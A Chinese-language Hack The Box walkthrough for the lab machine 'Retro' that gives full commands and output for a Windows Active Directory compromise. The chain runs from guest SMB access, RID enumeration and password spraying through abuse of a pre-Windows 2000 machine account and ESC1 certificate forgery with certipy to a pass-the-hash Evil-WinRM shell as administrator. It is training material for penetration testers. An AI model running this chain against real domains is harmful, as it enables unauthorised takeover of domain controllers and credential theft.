Retro
Retro 是一台难度为简单的入门靶机,通过SMB空会话获取到入口提示 Important.txt
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nmap 10.129.14.207 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-08 09:49 EST
Nmap scan report for 10.129.14.207
Host is up (0.20s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
58107/tcp open unknown
58411/tcp open unknown
62569/tcp open unknown
62577/tcp open unknown
62585/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 49.43 seconds
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nmap 10.129.14.207 -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,9389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-08 09:51 EST
Nmap scan report for 10.129.14.207
Host is up (0.084s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-08 14:51:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2025-12-08T14:53:18+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: 2025-12-08T14:53:17+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: 2025-12-08T14:53:18+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: 2025-12-08T14:53:17+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2025-12-07T14:28:20
|_Not valid after: 2026-06-08T14:28:20
|_ssl-date: 2025-12-08T14:53:17+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-12-08T14:52:38+00:00
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-12-08T14:52:39
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.06 seconds
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u '' -p '' --generate-hosts-file hosts
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\:
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat hosts
10.129.14.207 DC.retro.vl retro.vl DC
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u '' -p '' --generate-krb5-file /etc/krb5.conf
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] krb5 conf saved to: /etc/krb5.conf
SMB 10.129.14.207 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 10.129.14.207 445 DC [+] retro.vl\:
1.2. SMB空会话
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u 'g1uest' -p '' --shares
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\g1uest: (Guest)
SMB 10.129.14.207 445 DC [*] Enumerated shares
SMB 10.129.14.207 445 DC Share Permissions Remark
SMB 10.129.14.207 445 DC ----- ----------- ------
SMB 10.129.14.207 445 DC ADMIN$ Remote Admin
SMB 10.129.14.207 445 DC C$ Default share
SMB 10.129.14.207 445 DC IPC$ READ Remote IPC
SMB 10.129.14.207 445 DC NETLOGON Logon server share
SMB 10.129.14.207 445 DC Notes
SMB 10.129.14.207 445 DC SYSVOL Logon server share
SMB 10.129.14.207 445 DC Trainees READ
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# impacket-smbclient guest@10.129.14.207
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Notes
SYSVOL
Trainees
# use Trainees
# ls
drw-rw-rw- 0 Sun Jul 23 18:16:11 2023 .
drw-rw-rw- 0 Wed Jun 11 10:17:10 2025 ..
-rw-rw-rw- 288 Sun Jul 23 18:16:11 2023 Important.txt
# get Important.txt
# exit
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# ls
hosts Important.txt labs_C1trus33.ovpn note ports
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
亲爱的培训生们:
我知道你们中有些人总是记不住既强又独特的密码。
所以我们决定把你们全部合并到一个账户里。
别再烦我们了。拜托。我们还有别的事要做,不是每天给你们重置密码。
此致
管理员
1.3. rid枚举
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u 'guest' -p '' --rid-brute
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\guest:
SMB 10.129.14.207 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.14.207 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.14.207 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.14.207 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.14.207 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.14.207 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.14.207 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.14.207 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.14.207 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.14.207 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.14.207 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.14.207 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.14.207 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.14.207 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.14.207 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.14.207 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.14.207 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.14.207 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.14.207 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.14.207 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.14.207 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.14.207 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.14.207 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.14.207 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.14.207 445 DC 1109: RETRO\tblack (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat rids |grep SidTypeUser|awk '{print $6}'|cut -d '\' -f2
Administrator
Guest
krbtgt
DC$
trainee
BANKING$
jburley
tblack
1.4. 密码喷射
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u valid_users.txt -p valid_users.txt --no-bruteforce --continue-on-success
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [-] retro.vl\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\Guest:Guest STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\DC$:DC$ STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.14.207 445 DC [-] retro.vl\BANKING$:BANKING$ STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\jburley:jburley STATUS_LOGON_FAILURE
SMB 10.129.14.207 445 DC [-] retro.vl\tblack:tblack STATUS_LOGON_FAILURE
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u trainee -p trainee --shares
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.14.207 445 DC [*] Enumerated shares
SMB 10.129.14.207 445 DC Share Permissions Remark
SMB 10.129.14.207 445 DC ----- ----------- ------
SMB 10.129.14.207 445 DC ADMIN$ Remote Admin
SMB 10.129.14.207 445 DC C$ Default share
SMB 10.129.14.207 445 DC IPC$ READ Remote IPC
SMB 10.129.14.207 445 DC NETLOGON READ Logon server share
>>>> SMB 10.129.14.207 445 DC Notes READ
SMB 10.129.14.207 445 DC SYSVOL READ Logon server share
SMB 10.129.14.207 445 DC Trainees READ
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# impacket-smbclient trainee:trainee@10.129.14.207
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Notes
# ls
drw-rw-rw- 0 Tue Apr 8 23:12:49 2025 .
drw-rw-rw- 0 Wed Jun 11 10:17:10 2025 ..
-rw-rw-rw- 248 Sun Jul 23 18:05:56 2023 ToDo.txt
-rw-rw-rw- 32 Tue Apr 8 23:13:01 2025 user.txt
# get user.txt
# get ToDo.txt
# exit
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat user.txt
cbda362cff20**********
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
Thomas,
说服财务部门丢掉他们那套古老的银行软件之后,
终于可以开始清理他们留下的烂摊子了。我们应该先处理那个预创建的电脑账户——
那东西都比我岁数大了。
致意
James
2. System
2.1. Bloodhound
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# bloodhound-ce-python -c All -u trainee -p trainee -d retro.vl -ns 10.129.14.207 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: retro.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.retro.vl
INFO: Testing resolved hostname connectivity dead:beef::82ba:6225:ae6e:f1
INFO: Trying LDAP connection to dead:beef::82ba:6225:ae6e:f1
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.retro.vl
INFO: Testing resolved hostname connectivity dead:beef::82ba:6225:ae6e:f1
INFO: Trying LDAP connection to dead:beef::82ba:6225:ae6e:f1
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: DC.retro.vl
INFO: Done in 00M 21S
INFO: Compressing output into 20251208111430_bloodhound.zip
2.2. Pre-Windows 2000 computers
经常打htb的肯定知道,在win2000以前的机器用户,默认密码是其SAM Account Name的小写
Pre-Windows 2000 computers
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u BANKING$ -p banking
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
这里不需要改密码,只需要用kerberos认证即可
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u BANKING$ -p banking -k
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\BANKING$:banking
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc smb 10.129.14.207 -u BANKING$ -p banking -k --generate-tgt banking
SMB 10.129.14.207 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.14.207 445 DC [+] retro.vl\BANKING$:banking
SMB 10.129.14.207 445 DC [+] TGT saved to: banking.ccache
SMB 10.129.14.207 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=banking.ccache
2.3. AD CS
ADCS
存在 Certificate Service DCOM Access 这个组,很可能就有AD CS
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# nxc ldap 10.129.14.207 -u BANKING$ -p banking -k -M adcs
LDAP 10.129.14.207 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:retro.vl) (signing:None) (channel binding:Never)
LDAP 10.129.14.207 389 DC [+] retro.vl\BANKING$:banking
ADCS 10.129.14.207 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.14.207 389 DC Found PKI Enrollment Server: DC.retro.vl
ADCS 10.129.14.207 389 DC Found CN: retro-DC-CA
可以发现存在 PKI注册服务器 还有证书颁发机构 retro-DC-CA
Note
Finding Weak AD Computer Passwords | by Giulio Pierantoni | Medium
这里需要先修改机器账户的默认密码,这个默认密码是创建机器账户时的初始值,它是不受域信任的
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# impacket-changepasswd 'retro.vl/BANKING$:banking@10.129.14.207' -newpass 'Admin123' -dc-ip 10.129.14.207 -p rpc-samr
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
然后使用 certipy 检测ADCS漏洞
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy find -u 'banking$@DC.retro.vl' -p 'Admin123' -dc-ip '10.129.14.207' -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
>>>> Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
发现 RetroClients 模板存在 ESC1 漏洞,且可以被域内机器用户进行注册
2.4. ESC1
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy req \
-u 'banking$@DC.retro.vl' -p 'Admin123' \
-dc-ip '10.129.14.207' -target 'DC.retro.vl' \
-ca 'retro-DC-CA' -template 'RetroClients' \
-upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 12
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
这里报错提示 公钥的长度不满足此证书模板的最低长度要求
certipy 默认的公钥长度为2048,仔细看下模板的信息,可以发现最低长度为4096,我们尝试更改长度为4096
然后再次请求,这里需要请求两次,第二次才能成功
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy req \
-u 'banking$@DC.retro.vl' -p 'Admin123' \
-dc-ip '10.129.14.229' -target 'DC.retro.vl' \
-ca 'retro-DC-CA' -template 'RetroClients' \
-upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500' -key-size 4096
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy req \
-u 'banking$@DC.retro.vl' -p 'Admin123' \
-dc-ip '10.129.14.229' -target 'DC.retro.vl' \
-ca 'retro-DC-CA' -template 'RetroClients' \
-upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500' -key-size 4096
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 14
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
然后使用此证书请求tgt 并获取hash
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.14.229
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
┌──(root㉿kali)-[~/Desktop/htb/Retro]
└─# evil-winrm -i 10.129.14.207 -u administrator -H 252fac7066d93dd009d4fd2cd0368389
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
40fce9c3f09024bcab29*********